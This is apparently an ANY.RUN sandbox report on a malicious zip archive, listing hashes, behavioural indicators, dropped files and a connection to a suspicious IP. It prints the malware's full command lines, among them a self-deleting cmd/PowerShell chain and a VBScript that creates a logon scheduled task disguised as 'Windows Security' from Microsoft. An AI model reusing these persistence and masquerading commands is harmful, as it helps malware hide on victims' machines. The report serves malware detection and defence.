analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

7484076131.zip

Full analysis: https://app.any.run/tasks/56e52dd3-94d1-4bc8-83f9-3cb684d3712f
Verdict: Malicious activity
Analysis date: May 20, 2022, 17:23:42
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

A2924CF3292870BD0A63D96F23B77363

SHA1:

951BF94009AA6C445B2058FE1883130A91623D40

SHA256:

6CEE72904C3C3EFBD58857E33E18D18E6803F8B421AA8C154B422416BC0C3538

SSDEEP:

3072:5I61FIayiF/JpatqpxKY1VMps27NEqPmY9vYB+06dm561k:i61FIGTake8CfpEqP5U+S61k

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops executable file immediately after starts

      • WinRAR.exe (PID: 1580)
      • f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe (PID: 268)
    • Application was dropped or rewritten from another process

      • f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe (PID: 268)
      • Windows Security.exe (PID: 3168)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3348)
      • cmd.exe (PID: 3396)
      • cmd.exe (PID: 1204)
    • Loads the Task Scheduler COM API

      • cscript.exe (PID: 2028)
  • SUSPICIOUS

    • Checks supported languages

      • WinRAR.exe (PID: 1580)
      • f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe (PID: 268)
      • cmd.exe (PID: 1760)
      • powershell.exe (PID: 3712)
      • cmd.exe (PID: 3348)
      • Windows Security.exe (PID: 3168)
      • cmd.exe (PID: 1232)
      • cscript.exe (PID: 2028)
      • powershell.exe (PID: 1988)
      • cmd.exe (PID: 3396)
      • cmd.exe (PID: 1204)
      • powershell.exe (PID: 3284)
    • Reads the computer name

      • WinRAR.exe (PID: 1580)
      • f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe (PID: 268)
      • Windows Security.exe (PID: 3168)
      • powershell.exe (PID: 3712)
      • cscript.exe (PID: 2028)
      • powershell.exe (PID: 1988)
      • powershell.exe (PID: 3284)
    • Drops a file with a compile date too recent

      • WinRAR.exe (PID: 1580)
      • f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe (PID: 268)
    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 1580)
      • f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe (PID: 268)
    • Creates files in the user directory

      • f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe (PID: 268)
      • Windows Security.exe (PID: 3168)
    • Starts CMD.EXE for commands execution

      • f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe (PID: 268)
      • Windows Security.exe (PID: 3168)
    • Starts CMD.EXE for self-deleting

      • f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe (PID: 268)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 3348)
    • Reads Environment values

      • Windows Security.exe (PID: 3168)
    • Executes scripts

      • cmd.exe (PID: 1232)
  • INFO

    • Manual execution by user

      • f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe (PID: 268)
    • Reads the computer name

      • taskkill.exe (PID: 3556)
    • Checks supported languages

      • taskkill.exe (PID: 3556)
      • timeout.exe (PID: 3256)
    • Checks Windows Trust Settings

      • powershell.exe (PID: 3712)
      • cscript.exe (PID: 2028)
      • powershell.exe (PID: 1988)
      • powershell.exe (PID: 3284)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792
ZipUncompressedSize: 234496
ZipCompressedSize: 130869
ZipCRC: 0x3bf9d17b
ZipModifyDate: 1980:00:00 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0009
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
54
Monitored processes
14
Malicious processes
6
Suspicious processes
4

Behavior graph

Click at the process to see the details
start winrar.exe f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe cmd.exe no specs windows security.exe cmd.exe no specs taskkill.exe no specs powershell.exe no specs cmd.exe no specs cscript.exe no specs timeout.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1580"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\7484076131.zip"C:\Program Files\WinRAR\WinRAR.exe
Explorer.EXE
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
268"C:\Users\admin\Desktop\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe" C:\Users\admin\Desktop\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe
Explorer.EXE
User:
admin
Integrity Level:
MEDIUM
Exit code:
4294967295
1760"C:\Windows\System32\cmd.exe" /c "C:\Users\admin\AppData\Roaming\Microsoft\Security\Windows Security.exe"C:\Windows\System32\cmd.exef8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3168"C:\Users\admin\AppData\Roaming\Microsoft\Security\Windows Security.exe"C:\Users\admin\AppData\Roaming\Microsoft\Security\Windows Security.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
3348"C:\Windows\System32\cmd.exe" /c taskkill /F /PID 268 & powershell -command "$ErrorActionPreference= 'silentlycontinue'; (Get-WmiObject Win32_Process | Where-Object { $_.Path.StartsWith('C:\Users\admin\Desktop\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe') }).Terminate()" & timeout 3 > nul & del /F /S /Q /A "C:\Users\admin\Desktop\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe" & exitC:\Windows\System32\cmd.exef8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3556taskkill /F /PID 268 C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3712powershell -command "$ErrorActionPreference= 'silentlycontinue'; (Get-WmiObject Win32_Process | Where-Object { $_.Path.StartsWith('C:\Users\admin\Desktop\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exe') }).Terminate()" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
1232"C:\Windows\System32\cmd.exe" /c @echo off & echo const TriggerTypeLogon=9 : const ActionTypeExecutable=0 : const TASK_LOGON_INTERACTIVE_TOKEN=3 : const createOrUpdateTask=6 : Set service=CreateObject("Schedule.Service") : call service.Connect() : Dim rootFolder : Set rootFolder=service.GetFolder("") : Dim taskDefinition : Set taskDefinition=service.NewTask(0) : Dim regInfo : Set regInfo=taskDefinition.RegistrationInfo : regInfo.Author="Microsoft Corporation" : regInfo.Description="Windows Security is a software application that safeguards a system from malware. It was an anti-spyware program built to fight unauthorized access and protect Windows computers from unwanted software." : Dim settings : Set settings=taskDefinition.Settings : settings.StartWhenAvailable=True : settings.ExecutionTimeLimit="PT0S" : settings.AllowHardTerminate=False : settings.IdleSettings.StopOnIdleEnd=False : settings.DisallowStartIfOnBatteries=False : settings.StopIfGoingOnBatteries=False : Dim triggers : Set triggers=taskDefinition.Triggers : Dim trigger : Set trigger=triggers.Create(TriggerTypeLogon) : userId=CreateObject("WScript.Shell").ExpandEnvironmentStrings("%USERNAME%") : trigger.Id="LogonTriggerId" : trigger.UserId=userId : Dim Action : Set Action=taskDefinition.Actions.Create(ActionTypeExecutable) : Action.Path="C:\Users\admin\AppData\Roaming\Microsoft\Security\Windows Security.exe" : taskDefinition.Principal.UserId=userId : taskDefinition.Principal.LogonType=TASK_LOGON_INTERACTIVE_TOKEN : call rootFolder.RegisterTaskDefinition("Windows Security", taskDefinition, createOrUpdateTask, Empty, Empty, TASK_LOGON_INTERACTIVE_TOKEN) > C:\Users\admin\AppData\Local\Temp\tmp2B77.vbs & cscript //nologo C:\Users\admin\AppData\Local\Temp\tmp2B77.vbs & del C:\Users\admin\AppData\Local\Temp\tmp2B77.vbs /f /q & exitC:\Windows\System32\cmd.exeWindows Security.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2028cscript //nologo C:\Users\admin\AppData\Local\Temp\tmp2B77.vbs C:\Windows\system32\cscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Console Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3256timeout 3 C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
3 691
Read events
3 629
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
6
Text files
1
Unknown types
1

Dropped files

PID
Process
Filename
Type
1580WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb1580.8748\f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792executable
MD5:F53673AEC0316B62EC1960799C371B6F
SHA256:F8F34F31CCB111E148D818E7B5E5C4EA0268D97AF23BCCC6F25A59B3B03A1792
3712powershell.exeC:\Users\admin\AppData\Local\Temp\lq01kna4.zk1.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3712powershell.exeC:\Users\admin\AppData\Local\Temp\lhcdgcw3.cn3.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
268f8f34f31ccb111e148d818e7b5e5c4ea0268d97af23bccc6f25a59b3b03a1792.exeC:\Users\admin\AppData\Roaming\Microsoft\Security\Windows Security.exeexecutable
MD5:F53673AEC0316B62EC1960799C371B6F
SHA256:F8F34F31CCB111E148D818E7B5E5C4EA0268D97AF23BCCC6F25A59B3B03A1792
1232cmd.exeC:\Users\admin\AppData\Local\Temp\tmp2B77.vbstext
MD5:38BEE6EF6A8191DD08E6A79320F3D61D
SHA256:1F49C106C9535814D6D97AE50DD54757ACF8DC80D3331553F1DD70B104A21D2D
1988powershell.exeC:\Users\admin\AppData\Local\Temp\usriyqjn.flx.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
1988powershell.exeC:\Users\admin\AppData\Local\Temp\pxag0qbb.kkm.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3712powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivedbf
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
3284powershell.exeC:\Users\admin\AppData\Local\Temp\mtqmvj5v.spv.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3284powershell.exeC:\Users\admin\AppData\Local\Temp\wqo22ebs.t3q.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
4
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
193.233.48.87:27941
OOO FREEnet Group
RU
suspicious
3168
Windows Security.exe
193.233.48.87:27941
OOO FREEnet Group
RU
suspicious

DNS requests

Domain
IP
Reputation
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info